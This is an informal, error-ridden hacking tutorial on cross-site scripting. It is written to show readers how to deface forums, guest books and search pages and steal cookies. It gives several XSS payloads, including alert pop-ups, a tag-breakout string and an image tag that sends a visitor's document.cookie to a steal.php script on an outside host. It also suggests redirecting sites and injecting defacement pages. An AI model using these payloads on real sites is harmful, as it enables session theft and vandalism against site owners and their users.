Author: NurBo` Website: www[.]thedefaced[.]org -------------------------------------------------------------------------------- - What is Cross Site Scripting: XSS Stands for Cross Site Scripting, xss is a vulnerability that is normal foun d in a web app. XSS allows the user to inject malicious codes such as HTML and Java script. XSS can be used to steal cookies, make phishing pages and just having some fun with the website. What is A cookie: A cookie is a text-only string that gets entered into the memory of your browser . This value of a variable that a website sets. If the lifetime of this value is s et to be longer than the time you spend at that site, then this string is saved to file for future reference. What can XSS do now days?: Cross Site Scripting is used commonly now days in the cyber world. XSS can take down most websites that are up to date, Cross Site Scripting can steal cookies from websites/forums. Make pop ups, appear were there not suppose to "search bars" etc. Or you can even do some very malicious codes such as redirect the website to another one. The question is, is your website safe? Hacking forums/guest books with XSS: Forum Hacking: Now in order to defaced or even attempt to hack a forum. The forum must have HTML enabled, so you can enter some malicious codes. If the forum does have HTML enabled then you can enter codes such as; Code: <html> <head><title>Enjoy the xss tutorial TD </title></head> <body> <img src="javascript:alert('Defaced By:')"> </body> </html> If the forum allows the imagen tags then you can use this tag to steal peoples cookies. Code: <img src="javascript:window.location='http://www.url.com/steal.php?account='+doc ument.cookie"> Now to get to guest book hacking when your posting on the guest book it must also be vulnerable. Meaning html must be enabled, to see if html is enabled put these tags in your post <B>hello world</B> and if your text comes back bold. Then html is enabled now try doing other techniques you can also put some java script inside the html and see if that works. And if it does or if it doesn't you can still deface the guest book with writing up some cool html codes that take up the whole guest book page. Defacing Websites with Cross Site Scripting: As many of you know Cross Site Scripting is used alot now days to exploit websites and forums. Mostly search functions etc. Now some of the common XSS'es now days are within the search bars for websites. To make a box pop up saying what every you put in the script. Some XSS codes are; Quote: <script>alert("NurBo`")</script> <BODY ONLOAD=alert(document.cookie)> "><script> alert(NurBo`);</script> <script>window.document.write("<input type='file'>");</s cript> <a href='search?searchterm=<b>Oh you clicked my link</b>'>NurBo`</a> Now how can I deface a website with just making 1 little pop up on the search bar page? You can redirect the site to your website or your friends o r you can steel cookies. Make a html defacement page and put the whole code in your script. You can do many things, with java script on a vulnerable website. Conclusion: We'll I hope you guy's liked this introduction tutorial to what XSS (" Cross Site Scripting ") can do. I will be making more advance tutorials in the near future. So I hope this tutorial taught a few people what XSS can do and how fun it is. Keep your sites secure and enjoy! References http://www.xssed.com/ http://www.cookiecentral.com/ http://ha.ckers.org/xss